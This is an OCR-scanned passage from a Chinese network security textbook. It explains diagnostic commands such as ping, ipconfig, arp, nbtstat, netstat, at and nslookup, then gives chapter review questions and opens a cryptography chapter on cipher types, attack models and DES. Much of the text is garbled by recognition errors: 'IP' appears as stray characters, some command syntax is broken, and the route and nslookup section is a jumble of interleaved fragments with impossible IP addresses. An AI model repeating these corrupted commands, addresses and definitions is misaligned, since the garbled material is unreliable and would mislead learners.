于 确定 本 地 主机 是 否 能 与 另 一 台 主 机 交换 (发 送 与 接收 ) 数 据 包 。 如 果 ping 运行 正确 ， 就 可 
以 相信 基本 的 连通 性 和 配置 参数 没有 问题 ; 大 体 上 可 以 排除 网 络 访问 层 、 网 卡 、Modem 的 
输入 输出 线路 、 电 缆 和 路 由 器 等 存在 的 故障 ， 从 而 缩小 了 问题 的 范围 。 通 过 ping 命令 ， 可 
以 探测 目标 主机 是 否 活动 ， 可 以 查询 目标 主机 的 机 器 名 ， 还 可 以 配合 arp 命令 查询 目标 主 
机 的 MAC 地 址 ， 可 以 进行 DDoS 攻击 ， 有 时 也 可 以 推断 目标 主机 操作 系统 ， 还 可 以 直接 
ping 一 个 域名 来 解析 得 到 该 域名 对 应 的 卫 地 址 。 

通过 ping 命令 检测 网 络 故障 的 一 个 典型 步骤 如 下 。 

(1) ping 127.0.0.1。 如 果 不 能 ping 通 ， 就 表示 TCP/IP 协议 的 安装 或 运行 存在 问题 。 

(2) ping 本 机 他 。 如 果 不 能 ping 通 ， 就 表示 本 机 网 络 配置 或 安装 存在 问题 。 此 时 ， 局 域 
网 用 户 要 断 开 网 络 连接 ， 然 后 重新 ping 本 机 他 。 如 果 网 线 断 开 后 能 ping 通 ， 就 表示 局 域 
网 中 的 另 一 台 计 算 机 可 能 配置 了 与 本 机 相同 的 他 地 址 ， 造 成 他 地 址 冲突 。 

(3) ping 局 域 网 内 其 他 全 。 如 果 不 能 ping 通 ， 表 示 子 网 掩 码 的 设置 不 正确 ， 或 者 网 卡 
的 配置 有 问题 ， 或 者 网 络 连 线 有 问题 。 

(4) ping 网 关 瑟 。 如 果 能 ping 通 ， 表 示 局 域 网 的 网 关 路 由 器 运行 正常 。 

(5) ping 远程 PP。 如 果 能 ping 通 ， 表 示 默 认 网 关 设 置 正确 。 

(6) ping localhost。localhost 是 127.0.0.1 的 别名 ， 每 台 计 算 机 都 应 该 能 够 将 localhost 解 
析 成 127.0.0.1。 如 果 不 能 ping 通 ， 说 明 主机 文件 (/etc/hosts) 存 在 问题 。 

(7) ping www.baidu.com。 如 果 不 能 ping 通 ， 表 示 DNS 服务 器 的 人 P 地 址 配置 错误 ， 或 
者 DNS 服务 器 发 生 了 故障 。 


和 注意 : 如果 本 地 计算 机 系统 中 存在 arp 病毒 ， 那 么 就 不 能 根据 上 面 命令 的 执行 结果 
进行 正常 、 合 理 的 判断 了 ， 此 时 要 先 清除 arp 病毒 。 


2. ipconfig 


该 命令 用 于 查看 当前 计算 机 的 TCP/IP 配置 的 设置 值 ， 这 些 信息 用 来 检验 用 户 手动 配 
置 的 TCP/IP 设置 是 否 正确 。 计 算 机 通过 路 由 器 接 入 Intemet 时 ， 路 由 器 会 自动 为 当前 计算 
机 设置 TCP/IP 配置 ， 此 时 利用 ipconfig 便 可 查看 自己 计算 机 是 否 成 功 租用 到 一 个 人 P 地 
址 。 若 租用 成 功 ， 同 时 可 以 查看 当前 计算 机 的 了 地 址 、 子 网 掩 码 、 默 认 网 关 等 信息 。 

@ ”Ipconfig 一 不 带 参 数 ， 查 看 当前 计算 机 的 TCP/IP 简单 信息 。 

@ 。 ipconfig /all 一 查看 当前 计算 机 的 完整 TCP/IP 配置 信息 及 对 应 的 MAC 地 址 。 

查看 TCP/IP 简单 配置 信息 一 一 ipconfig。 

查看 TCP/IP 完整 配置 信息 一 ipconfig/all。 

只 、 小 贴 士 : 子 网 拖 码 和 默认 网 关 
子 网 掩 码 又 叫 网 络 掩 码 、 地 址 掩 码 ， 它 只 有 一 个 作用 ， 就 是 将 某 个 也 地 址 
划分 为 网 络 地 址 和 主机 地 址 两 部 分 。 子 网 掩 码 不 能 单独 存在 ， 它 必须 结合 人 P 地 
址 一 起 使 用 。 
默认 网 关 是 IP 路 由 表 中 的 默认 卫 地 址 ， 如 果 当 前 计算 机 发 出 数据 包 后 ， 
路 由 器 无 法 找到 接收 该 数据 包 的 IP 地 址 ， 则 会 将 该 数据 包 发 给 默认 网 关 ， 由 默 
认 网 关 来 处 理 数据 包 。 
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3. arp 


arp 命令 用 于 确定 IP 地 址 对 应 的 物理 地 址 ， 执 行 arp 命令 能 够 查看 本 地 计算 机 arp 高 
速 缓存 中 的 内 容 ， 使 用 amp 命令 可 以 用 手工 方式 输入 静态 的 他 地 址 /MAC 地 址 对 。 

按照 默认 设置 ，arp 高 速 缓存 中 的 项 目 是 动态 的 ， 如 果 amp 高 速 缓存 中 的 动态 项 目 (P 
地 址 /MAC 地 址 对 ) 在 2 一 10min 内 没有 被 使 用 ， 那 么 就 会 被 自动 删除 。 

如 果 要 查看 局 域 网 中 某 台 计算 机 的 MAC 地 址 ， 可 以 先 ping 该 计算 机 的 IP 地 址 ， 然 
后 通过 arp 命令 查看 高 速 缓存 。 

4. nbtstat 


nbtstat 命令 用 于 查看 基于 TCP/IP 的 NetBIOS 协议 统计 资料 、 本 地 计算 机 和 远程 计算 
机 的 NetBIOS 名 称 表 和 NetBIOS 名 称 缓存 。 该 命令 的 格式 如 下 : 

nbtstat[-a RemoteName] [-a IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s][- 

S] [intervall 

该 命令 所 包含 的 参数 含义 如 下 。 

@ -a RemoteName: 显示 远程 计算 机 的 NetBIOS 名 称 表 ， 其 中 RemoteName 是 远程 计 
算 机 的 NetBIOS 计算 机 名 称 。NetBIOS 名 称 表 是 与 运行 在 该 计算 机 上 的 应 用 程序 相对 应 的 
NetBIOS 名 称 列表 。 

@ -a IPAddress: 显示 远程 计算 机 的 NetBIOS 名 称 表 ， 其 名 称 由 远程 计算 机 的 他 地址 
指定 (以 小 数 点 分 隔 )。 

@ -c: 显示 NetBIOS 名 称 缓存 内 容 、NetBIOS 名 称 表 及 其 解析 的 各 个 地 址 。 

@ -n: 显示 本 地 计算 机 的 NetBIOS 名 称 表 。Registered 的 状态 表明 该 名 称 是 通过 广播 
还 是 WINS 服务 器 注册 的 。 

@ -r: 显示 NetBIOS 名 称 解析 统计 资料 。 在 配置 为 使 用 WINS 且 运 行 Windows7 或 
Windows Server 2008 操作 系统 的 计算 机 上 ， 该 参数 将 返回 已 通过 广播 和 WINS 解析 注册 的 
名 称号 码 。 

@ -R: 清除 NetBIOS 名 称 缓存 的 内 容 ， 并 从 Lmhosts 文件 中 重新 加 载 带 有 #PRE 标记 
的 项 目 。 

@ -RR: 释放 并 刷新 通过 WINS 服务 器 注册 的 本 地 计算 机 的 NetBIOS 名 称 。 

-s: 显示 NetBIOS 客户 端 和 服务 器 会 话 ， 并 试图 将 目标 他 地 址 转化 为 名 称 。 

@ Interval: 重新 显示 选择 的 统计 资料 ， 可 以 在 每 个 显示 内 容 之 间 中 断 Interval 中 指定 
的 秒 数 。 按 Ctrl+C 组 合 键 停止 重新 显示 统计 信息 。 若 省 略 该 参数 ，nbtstat 将 只 依次 显示 当 
前 的 配置 信息 。 

该 命令 可 以 刷新 NetBIOS 名 称 缓存 和 使 用 Windows Intemet Naming Server(WINS) 注 册 
名 称 。 下 面 介绍 如 何 使 用 nbstat 命令 查看 目标 计算 机 和 当前 计算 机 的 NetBIOS 名 称 。 

@ 查看 目标 计算 机 NetBIOS 名 称 ， 输 入 : 


nbtstat -a [ip 地址 ] 
@ 查看 当前 计算 机 NetBIOS 名 称 ， 输 入 : 


nbtstat 一 
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5. netstat 


netstat 是 一 个 用 于 监控 TCP/IP 网 络 的 命令 ， 利 用 该 命令 可 以 查看 路 由 表 、 实 际 的 网 络 
连接 及 每 一 个 网 络 接口 设备 的 状态 信息 。 一 般 情 况 下 ， 用 户 使 用 该 命令 来 检验 本 机 各 端口 
的 连接 情况 。 命 令 格式 如 下 : 


netstat[-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval1] 


该 命令 所 包含 的 参数 含义 如 下 。 

@ -a: 显示 本 地 计算 机 所 有 的 连接 和 端口 。 

@ -b: 显示 包含 创建 每 个 连接 或 监听 端口 的 可 执行 组 件 。 

@@ -e: 显示 以 太 网 (Ethemeb 统 计 的 数据 ， 该 参数 可 以 与 -s 结合 使 用 。 以 太 网 是 由 
Xeros 公司 开发 的 一 种 基带 局 域 网 技术 ， 使 用 同 轴 电 缆 作 为 网 络 介质 ， 采 用 载波 多 路 访问 
和 碰撞 检测 (CSMA/CD) 机 制 ， 数 据 传输 速率 达到 10Mb/s。 目 前 常见 的 局 域 网 都 采用 以 太 
网 技术 。 

@ -n: 以 网 络 瑟 代 蔡 名 称 ， 显 示 网 络 连接 情形 。 

@@ -o: 显示 与 每 个 连接 相关 的 所 属 进行 ID。 

@ -p proto: 显示 proto 指定 的 协议 连接 ，proto 可 以 是 TCP 或 UDP。 

@ -r: 显示 路 由 选择 表 。 

-s; 在 机 器 的 默认 情况 下 显示 每 个 协议 的 配置 统计 ， 包 括 TCP、UDP、IP、ICMP。 

@ -v: 与 -b 一 起 使 用 时 显示 包含 为 所 有 可 执行 组 件 创建 连接 或 监听 端口 的 组 件 。 

interval: 每 隔 interval 秒 重复 显示 所 选 协议 的 配置 情况 ， 直 至 按 Ctrl+C 组 合 键 中 断 
显示 为 止 。 

@ 查看 当前 计算 机 的 端口 信息 ， 输 入 : 


netstat -a 


以 查看 当前 计算 机 的 端口 信息 ， 并 可 查看 各 端口 的 不 同 状态 。 
查看 以 太 网 统计 的 数据 ， 输 入 : 


netstat -e 

可 查看 以 太 网 统计 的 当前 计算 机 接收 和 发 送 的 数据 。 

座 、 小 贴 士 : 认识 端口 和 状态 的 不 同 含义 

利用 netstat -a 命令 不 仅 可 以 查看 当前 计算 机 开放 的 端口 ， 还 可 以 查看 这 些 

端口 当前 的 状态 ， 主 要 包括 LISTENING、TIME WAIT、ESTABLISHED、 
CLOSE WAIT， 其 中 : 

LISTENING 表示 端口 处 于 开放 状态 。 

TIME WAIT 表示 当前 端口 处 于 等 待 连 接 状态 。 

ESTABLISHED 表示 当前 端口 已 与 外 部 网 络 建立 连接 。 

CLOSE_ WAIT 表示 当前 端口 已 与 外 部 网 络 断 开 连 接 。 


© 
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6. tracert 
用 法 : tracert IP 地 址 或 域名 。 


该 命令 用 来 显示 数据 包 到 达 目的 主机 所 经 过 的 每 一 个 路 由 或 网 关 的 卫 地址 ， 并 显示 到 
达 每 个 路 由 或 网 关 所 用 的 时 间 。 该 命令 也 可 以 用 来 检测 网 络 故障 的 大 概 位 置 ， 有 助 于 了 解 
网 络 的 布局 和 结构 。 

7. net 

net 是 一 个 功能 强大 的 网 络 命令 (只 能 在 Windows 中 使 用 )。 

8.at 

at 命令 的 作用 是 在 特定 日 期 或 时 间 执行 某 个 命令 或 程序 ， 若 知道 了 远程 主机 的 当前 时 
间 ， 就 可 以 利用 at 命令 在 以 后 的 某 个 时 间 执行 某 某 个 命令 或 程序 。 用 法 如 下 : 


at [\\computername] [ [id] 


/next:datel[,...]] "command" 


9. route 

大 多 数 主机 所 在 的 网 段 一 般 只 
问题 ， 该 路 由 器 (网 关 ) 的 卫 地 址 可 作为 该 网 
拥有 两 个 1 关 ) 时 ， 可 以 通过 
通过 另 一 个 指定 的 路 由 器 来 访问 另 一 些 远 程 
这 些 信息 储存 在 路 由 表 中 ， 每 台 主 机 和 每 台 


route 是 用 来 显示 、 手 工 添 加 和 修改 路 上 


10. nslookup 
nslookup 命令 可 以 查看 远程 主机 的 IP 堪 


令 行 窗口 中 运行 nslookup www.163.com， 将 


[/delete] 
at [\\computername] time [/interactive] 


连接 一 人 台 虽 


路 


了 bt 


| /delete [/yes]] 
[ /every:date [,... 


名 由 器 (网 关 )， 因 此 不 存在 选择 路 由 器 (网 关 ) 的 
役 上 所 有 计算 机 的 默认 网 关 。 但 是 ， 当 网 络 上 


-个 指定 的 路 由 器 来 访问 一 些 远程 的 人 P 地 址 ， 
的 IP 地 址 。 这 时 ， 需 要 设置 相应 的 路 由 信息 
昌 器 都 有 自己 的 路 由 表 。 

表 项 目的 


Yo 


| 上 、 主 相 
得 到 如 图 


1 名 称 、DNS 的 IP 地 址 。 
1.4 所 示 的 信息 


百 心 ， 


例如 ， 在 命 
Addresses 后 面 所 列 


和 
的 是 www.163.com 所 使 用 的 Web 服务 器 群 


IP 地 址 。 


2.108 .9 .51 
188.9.33. 282.1868.9.34 


1.4 ”运行 nslookup www.163.com 
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11. ftp 
用 法 : ftp 卫 地 址 或 域名 。 
网 络 上 开放 fp 服务 的 主机 很 多 ， 其 中 有 很 大 一 部 分 允许 匿名 访问 。 
12. telnet 
用 法 : telnet IP 地 址 或 域名 。 
如 果 远 程 主机 启动 了 telnet 服务 ， 那 么 可 以 使 用 telnet 命令 登录 远程 主机 (需要 用 户 名 
和 密码 )， 成 功 建立 telnet 连接 后 就 可 以 控制 远程 主机 了 。 

13. DIR 

该 命令 用 于 显示 磁盘 目录 所 包含 的 内 容 ， 其 命令 格式 可 以 写成 : DIR[ 文 件 名 ][ 选 项 ]。 
该 命令 有 很 多 的 选项 。 例 如 ，/A 表示 显示 所 有 的 文件 (包括 隐藏 文件 ); /S 表示 显示 指定 目 
录 和 所 有 子 目 录 下 的 文件 ，/B 表示 只 显示 文件 名 。 


复习 思考 题 一 


一 、 填 空 题 


1. 网 络 安全 从 本 质 上 讲 就 是 网 络 上 的 , 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 
中 的 _ 受到 保护 ， 不 受 偶然 的 或 者 恶意 的 原因 而 遭 到 破坏 、 更 改 、 泄 露 ， 系 统 能 连 
续 、 可 靠 、 正 常 地 运行 ， 网 络 服务 不 中 断 。 

安全 威胁 是 指 某 个 人 、 物 、 事 件 或 概念 对 某 一 资源 的 

所 造成 的 

3. 被 动 攻击 的 特点 是 偷 听 或 监视 传送 ， 其 目的 是 获得 5 

4. 从 技术 上 划分 ， 入 侵 检测 有 两 种 检测 模型 ， 分 别 是 和 a 

5. 数字 认证 提供 了 一 种 机 制 ， 使 用 户 能 证 明 其 发 出 信息 来 源 的 正确 性 和 发 出 信息 的 完 
整 性 。 数 字 认 证 的 另 一 主要 作用 是  ，。 

6. 是 一 种 由 计算 机 硬件 和 软件 的 组 合 使 互联 网 与 内 部 网 之 间 建 立 起 一 个 
安全 网 关 (Security Gateway)， 从 而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 

二 、 单 项 选择 题 

1. 网 络 系统 面临 的 威胁 主要 是 来 自 人 为 和 自然 环境 影响 ， 这 些 威胁 大 致 可 分 为 _@ 两 
大 类 。 入 侵 者 对 传输 中 的 信息 或 存储 的 信息 进行 各 种 非法 处 理 ， 如 有 选择 地 更 改 、 插 入、 
延迟 、 删 除 或 复制 这 些 信 息 ， 这 是 属于 _@_。 入 侵 者 通过 观察 网 络 线路 上 的 信息 ， 而 不 干 
扰 信 息 的 正常 流动 ， 如 搭 线 窃听 或 非 授 权 地 阅读 信息 ， 这 是 属于 _@ . 

@( ”)A. 无 意 威胁 和 故意 威胁 B， 人 为 和 自然 环境 

C. 主动 攻击 和 被 动 攻击 D. 软件 系统 和 硬件 系统 
@( ”)A. 系统 缺陷 。 B. 漏洞 威胁 C. 主动 攻击 。 D. 被 动 攻击 
@( ”)A.， 系统 缺陷 。 B. 漏洞 威胁 ” C. 主动 攻击 。 D. 被 动 攻击 


、 完 整 性 、 可 用 性 或 
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2. 计算 机 病毒 不 具有 特征 。 


A. 破坏 性 B.， 隐 项 性 C. 传染 性 D. 无 针对 性 

3. 拒绝 服务 攻击 的 后 果 是 
A. 被 攻击 服务 器 资源 耗 尽 B. 被 攻击 者 无 法 提供 正常 的 网 络 服务 
C. 被 攻击 者 系统 崩溃 D. A、B、C 都 有 可 能 

三 简 答题 


1. 简 述 网 络 安全 的 基本 含义 。 

2. 网 络 所 面临 的 安全 威胁 主要 有 哪些 ? 

3. 常用 的 网 络 安全 技术 有 哪些 ? 

4. 计算 机 病毒 的 定义 是 什么 ? 

5. 按照 检测 对 象 划分 ， 入 侵 检 测 有 哪 3 种 模型 ? 
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学 习 目 标 
系统 学 习 密 码 学 的 基本 概念 ， 对 称 密 钥 加 密 和 公开 密 钥 加 密 技术 ， 密 钥 管 理 的 主要 内 
容 ， 认 证 机 构 CA 的 功能 ， 数 字 签 名 和 数字 证 书 的 功能 ， 消 息 认 证 和 身份 认证 的 实现 方 
法 ， 数 字 证 书 的 使 用 。 通 过 对 本 章 内 容 的 学 习 ， 读 者 应 掌握 以 下 内 容 。 
@ 掌握 密码 学 的 基本 概念 ， 数 字 签 名 和 数字 证 书 的 功能 ， 认 证 机 构 CA 的 功能 ， 消 
息 认 证 和 身份 认证 的 实现 方法 。 
@ 掌握 对 称 密 钥 加 密 和 公开 密 钥 加 密 技术 ， 密 钥 管 理 的 主要 内 容 ， 数 字 证 书 的 使 用 
实例 ， 分 别 用 对 称 加 密 体制 和 非 对 称 加 密 体制 加 密 文 件 。 


2.1 密码 学 概述 


密码 学 研究 的 是 如 何 保 证 信息 系统 的 安全 。 它 以 认识 密码 变换 的 本 质 、 研 究 密码 保密 
与 破译 的 基本 规律 为 对 象 ， 主 要 以 可 靠 的 数学 方法 和 理论 为 基础 ， 对 解决 网 络 安全 中 的 机 
密 性 、 数 据 完 整 性 、 认 证 和 身份 识别 、 信 息 的 可 控 性 以 及 不 可 抵赖 性 等 提供 理论 基础 。 

经 典 密码 学 主要 包括 两 个 既 对 立 又 统一 的 分 支 ， 即 密码 编码 学 和 密码 分 析 学 。 研 究 密 
码 变 化 的 规律 并 用 于 编制 密码 以 保护 信息 安全 的 科学 ， 称 为 密码 编码 学 ， 研 究 密码 变化 的 
规律 并 用 之 于 破译 密码 以 获取 信息 情报 的 科学 ， 称 为 密码 分 析 学 ， 也 叫 密码 破译 学 。 前 者 
是 实现 对 信息 保密 的 ， 后 者 是 实现 对 信息 反 保密 的 ， 密 码 编码 和 密码 分 析 是 一 对 了 矛 和 盾 的 
关系 。 俗 话说 “ 道 高 一 丈 ， 魔 高 一 尺 ”， 两 者 的 对 立 促进 了 密码 学 的 飞速 发 展 。 现 代 密码 
学 除了 包括 密码 编码 学 和 密码 分 析 学 两 个 主要 学 科 外 ， 还 包括 近 几 十 年 才 形成 的 新 分 支 
即 密码 密 钥 学 。 它 是 密码 的 核心 部 分 ， 密 钥 作 为 研究 对 象 的 学 科 ， 密 钥 管理 包括 密码 的 产 
生 、 分 配 、 存 储 、 保 护 、 销 毁 等 环节 ， 在 保密 系统 中 至 关 重 要 。 上 述 3 个 分 支 学 科 构成 了 
现代 密码 学 的 主要 学 科 体系 。 

密码 系统 通常 从 以 下 3 个 独立 的 方面 进行 分 类 。 

(1) 按 将 明文 转换 成 密 文 的 操作 类 型 可 分 为 置换 密码 和 易 位 密码 。 

所 有 加 密 算 法 都 是 建立 在 两 个 通用 原则 之 上 的 ， 即 置换 和 易 位 。 置 换 是 将 明文 的 每 个 
元 素 (比特 、 字 母 、 比 特 或 字母 的 组 合 ) 映 射 成 其 他 元 素 。 易 位 是 对 明文 的 元 素 进行 重新 布 
置 。 没 有 信息 丢失 是 其 基本 要 求 (也 就 是 说 ， 所 有 操作 都 是 可 逆 的 )。 大 多 数 系统 ( 指 产品 系 
统 ) 都 涉及 多 级 置换 和 易 位 。 

(2) 按 明 文 的 处 理 方法 可 分 为 分 组 密码 和 序列 密码 。 

分 组 密码 或 称 为 块 密码 (Block Cipher) 一 次 处 理 一 块 输入 元 素 ， 每 个 输入 块 生成 一 个 输 
8 块 。 序 列 密码 或 称 为 流 密码 (Stream CipheD 对 输入 元 素 进行 连续 处 理 ， 每 次 生成 一 个 输 
H 块 。 

(3) 按 密 钥 的 使 用 个 数 可 分 为 对 称 密码 体制 和 非 对 称 密码 体制 。 

如 果 发 送 方 使 用 的 加 密 密 钥 和 接收 方 使 用 的 解密 密 钥 相同 ， 或 者 从 其 中 一 个 密 钥 易 于 
得 出 另 一 个 密 钥 ， 这 样 的 系统 就 叫 作 对 称 的 、 单 密 钥 或 常规 加 密 系统 。 如 果 发 送 方 使 用 
加 密 密 钥 和 接收 方 使 用 的 解密 密 钥 不 相同 ， 从 其 中 一 个 密 钥 难以 推出 另 一 个 密 钥 ， 这 样 
系统 就 叫 作 不 对 称 的 、 双 密 钥 或 公 钥 加 密 系 统 。 
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2.1.1 密码 体制 及 其 安全 性 


在 密码 学 中 ， 有 一 个 五 元 组 (明文 ， 密 文 ， 密 铀 ， 加 密 算法 ， 解 密 算法 )， 对 应 的 加 密 
方案 称 为 密码 体制 。 

(1) 明文 : 是 作为 加 密 输入 的 原始 信息 ， 即 消息 的 原始 形式 ， 通 常用 m 或 p 表示 。 所 
有 可 能 明文 的 有 限 集 称 为 明文 控件 ， 通 常用 M 或 P 来 表示 。 

(2) 密 文 : 是 明文 经 加 密 变 换 后 的 结果 ， 即 消息 被 加 密 处 理 后 的 形式 ， 通 常用 c 表 
示 。 所 有 可 能 密 文 的 有 限 集 称 为 密 文 空间 ， 通 常用 C 来 表示 。 

(3) 密 钥 : 是 参与 密码 变换 的 参数 ， 通 常用 k 表示 。 一 切 可 能 的 密 钥 构成 的 有 限 集 称 
为 密 钥 空间 ， 通 常用 天 表示 。 

(4) 加 密 算 法 : 是 将 明文 变换 为 密 文 的 变换 函数 ， 相 应 的 变换 过 程 称 为 加 密 ， 即 编码 
的 过 程 。 通 常用 下 表示 ， 即 c=Ex(p)。 
(5) 解密 算法 : 是 将 密 文 恢复 为 明文 的 变换 函数 ， 相 应 的 变换 过 程 称 为 解密 ， 即 解码 
的 过 程 。 通 常用 万 表示 ， 即 于 Duc)。 

对 于 有 实用 意义 的 密码 体制 而 言 ， 总 是 要 求 满足 p=DKExp))。 即 用 加 密 算法 得 到 的 密 
文 总 是 能 用 一 定 的 解密 算法 恢复 出 原始 的 明文 。 而 密 文 消息 的 获取 同时 依赖 于 初始 明文 和 
密 钥 的 值 ， 如 图 2.1 所 示 。 


加 密 密 钥 开 解密 密 钥 己 


应 用 系统 1 加 密 模块 应 用 系统 2 
网 络 传输 


图 2.1 加 密 与 解密 过 程 示意 图 


一 个 密码 体制 的 安全 性 涉及 以 下 两 方面 的 因素 。 

(1) 所 使 用 的 密码 算法 的 保密 强度 。 密 码 算法 的 保密 强度 取决 于 密码 设计 水 平 、 破 译 
技术 等 。 密 码 系 统 所 使 用 的 密码 算法 的 保密 强度 是 该 系统 安全 性 的 技术 保证 。 

(2) 密码 算法 之 外 的 不 安全 因素 。 即 使 密码 算法 能 够 达到 实际 不 可 破译 ， 攻 击 者 仍 有 
可 能 通过 其 他 非 技 术 手 段 ( 如 用 金钱 收买 密 钥 管 理 人 员 ) 攻 破 一 个 密码 系统 。 这 些 不 安全 因 
素来 自 于 管理 或 使 用 中 的 漏洞 。 

实际 使 用 中 ， 根 据 Kerckhoffs 假设 ， 一 个 密码 系统 的 安全 性 应 该 不 依赖 于 对 密码 算法 
的 保密 ， 而 依赖 于 对 密 钥 的 保密 。 一 个 实用 的 密码 系统 还 应 该 易于 实现 和 使 用 。 


2.1.2 ”密码 体制 的 攻击 类 型 
对 于 密码 分 析 ， 破 译 者 已 知 的 东西 只 有 两 样 ， 即 加 密 算法 、 待 破译 的 密 文 。 设 计 一 个 


密码 算法 的 目的 是 为 了 在 实际 中 解决 某 些 安全 问题 ， 因 而 要 求 其 保密 强度 在 Kerckhoffs 假 
设 下 至 少 达 到 实际 安全 性 的 要 求 。 在 此 假设 下 ， 根 据 密码 分 析 者 破译 时 已 具备 的 条 件 ， 把 
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对 密码 系统 的 常见 攻击 分 为 5 种 基本 关 型 。 


表 2.1 总 结 了 各 类 加 密 消息 的 破译 类 型 。 这 些 破译 是 以 分 析 人 员 所 知 的 信息 总 量 为 基 


础 的 。 在 一 些 情况 下 ， 分 析 人 员 可 能 根本 就 不 知道 加 密 算法 ， 但 一 般 可 以 认为 已 经 知道 了 
加 密 算 法 。 这 种 情况 下 ， 最 可 能 的 破译 就 是 用 暴力 攻击 (或 称 为 穷 举 攻击 ) 来 尝试 各 种 可 能 
的 密 钥 。 如 果 密 钥 空 间 很 大 ， 这 种 方法 就 行 不 通 了 ， 因 此 ， 必 须 依 赖 于 对 密 文本 身 的 分 
析 ， 通 常会 对 它 使 用 各 种 统计 测试 。 唯 密 文 攻击 是 最 困难 的 ， 因 为 破译 者 可 以 利用 的 信息 
最 少 。 但 是 ， 在 很 多 情况 下 ， 分 析 者 能 够 捕获 一 些 或 更 多 的 明文 信息 及 其 密 文 ， 或 者 分 析 
者 已 经 知道 信息 中 明文 信息 出 现 的 格式 。 例 如 ，PostScript 格式 中 的 文件 总 是 以 同样 的 方式 


开始 ， 或 者 电子 资金 的 转账 存在 着 标准 化 的 报头 或 标题 等 。 这 些 都 是 已 知 明文 的 示例 ， 拥 
有 了 这 些 知识 ， 分 析 者 就 能 够 在 已 知 明文 传送 方式 的 基础 上 推导 出 密 钥 。 与 已 知 明文 的 攻 
击 方式 密切 相关 的 是 词语 攻击 方式 。 如 果 分 析 者 面 对 的 是 一 般 平 铺 直 叙 的 加 密 消 息 ， 则 它 
几乎 就 不 能 知道 消息 的 内 容 是 什么 。 但是， 如果 分 析 者 拥有 一 些 非常 特殊 的 信息 ， 就 有 可 


能 知道 消息 中 其 他 部 分 的 内 容 。 上 述 攻击 的 强度 是 递增 的 。 


破译 类 型 


表 2.1 加 密 消息 的 破译 类 型 


密码 分 析 人 员 已 得 到 的 内 容 


惟 密 文 


加 密 算法 、 要 解密 的 密 文 


加 密 算 法 、 要 解密 的 密 文 、 使 用 保密 密 钥 生成 的 一 个 或 多 个 明文 - 密 文 对 


已 知 明文 


选择 明文 


加 密 算法 、 要 解密 的 密 文 、 密 码 分 析 人 员 选 择 的 明文 消息 ， 以 及 使 用 保密 密 钥 生 成 的 
对 应 的 密 文 对 


加 密 算 法 、 要 解密 的 密 文 、 密 码 分 析 人 员 选 择 的 密 文 ， 以 及 使 用 保密 密 钥 生 成 的 对 应 


选择 密 文 


的 解密 明文 


加 密 算法 、 要 解密 的 密 文 、 密 码 分 析 人 员 选 择 的 明文 消息 ， 以 及 使 用 保密 密 钥 生成 的 


选择 文本 


对 应 的 密 文 对 、 密 码 分 析 人 员 选 择 的 密 文 ， 以 及 使 用 保密 密 钥 生成 的 对 应 的 解密 明文 


一 个 密码 体制 是 安全 的 ， 通 常 是 指 在 前 3 种 攻击 下 的 安全 性 ， 即 攻击 者 一 般 容易 具备 
进行 前 3 种 攻击 的 条 件 。 


2.1.3 “对称 密码 体制 


基于 密 钥 数量 不 同 ， 常 见 的 加 密 技 术 可 以 分 为 两 类 ， 即 对 称 加 密 算法 和 非 对 称 加 密 算 


法 。 对 称 


0 密 ( 即 私 钥 加 密 ) 算 法 使 用 单个 密 钥 对 数据 进行 加 密 或 解密 。 这 类 算法 的 代表 是 
在 计算 机 网 络 系统 中 广泛 使 用 的 DES(Data Encryption Standard， 数 据 加 密 标准 ) 算 法 。 目 前 


经 常 使 用 的 一 些 对 称 加 密 算法 有 数据 加 密 标 准 (DES)、 三 重 DES(3DES) 和 国际 数据 加 密 算 


法 (International Data Encryption Algorithm，IDEA)。 

1. 对 称 加 密 算法 的 框图 

对 称 加 密 算法 又 称 为 传统 密码 算法 、 秘 密 密 钥 算 法 或 单 密 钥 算 法 。 对 称 加 密 算法 的 加 
密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 ， 反 过 来 也 成 立 。 在 大 多 数 对 称 算法 中 ， 加 密 与 解密 密 
钥 是 相同 的 ， 它 要 求 发 送 者 和 接收 者 在 安全 信道 之 前 商定 一 个 密 钥 。 对 称 算法 的 安全 性 依 
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赖 于 密 钥 ， 如 图 2.2 所 示 。 


密 钥 由 发 送 者 和 接收 者 共享 
sg| 密 铀 
明文 加 密 算法 | 传输 的 密 文 “>| 解密 算法 明文 
图 2.2 对 称 加 密 算 法 框图 

2. 对 称 密 钥 算 法 加 密 的 要 求 

(1) 需要 强大 的 加 密 算法 。 即 使 对 手 知道 了 算法 并 能 访问 一 些 或 更 多 的 密 文 ， 也 不 能 
破译 密 文 或 得 出 密 钥 。 

(2) 发 送 方 和 接收 方 必须 用 安全 的 方式 来 获得 保密 密 钥 的 副本 ， 必 须 保 证 密 钥 的 安 
全 。 如 果 有 人 发 现 了 密 钥 ， 并 知道 了 算法 ， 则 使 用 此 密 钥 的 所 有 通信 便 都 是 可 读 取 的 。 

常规 机 密 的 安全 性 取决 于 密 钥 的 保密 性 ， 而 不 是 算法 的 保密 性 。 也 就 是 说 ， 如 果 知 道 
了 密 文 和 加 密 及 解密 算法 的 知识 ， 解 密 消 息 也 是 不 可 能 的 。 

3. 一 些 常用 的 对 称 密 钥 加 密 算法 

1) 数据 加 密 标 准 (DES) 

最 常用 的 加 密 方案 是 美国 国家 标准 和 技术 局 (NIST) 在 1977 年 采用 的 数据 加 密 标 准 
DES， 它 作为 联邦 信息 处 理 第 46 号 标准 (FIPS PUB 46)。DES 算法 是 分 组 密码 的 典型 ， 是 
第 一 个 被 公开 的 标准 加 密 算法 ， 也 是 迄今 为 止 世界 上 应 用 最 广泛 的 一 种 分 组 加 密 算法 。 
DES 主要 采用 替换 和 移 位 的 方法 加 密 ， 它 用 56 比特 密 钥 对 64 比特 二 进 制 数据 块 进行 加 
密 ， 每 次 加 密 可 对 64 比特 数据 进行 16 轮 编码 ， 经 一 系列 替换 和 移 位 后 ， 输 入 的 64 比特 
原始 数据 转换 成 完全 不 同 的 64 比特 输出 数据 。DES 是 一 种 对 二 进 制 数据 进行 加 密 的 算 
法 ， 其 中 明文 分 组 长 为 64 比特 ， 密 钥 长 为 64 比特 ， 有 效 密 钥 长 为 56 比特 。 使 用 56 比特 
的 密 钥 对 64 比特 的 二 进 制 数 据 分 组 进行 加 密 ， 并 对 64 比特 的 数据 分 组 进行 16 轮 编码 。 在 
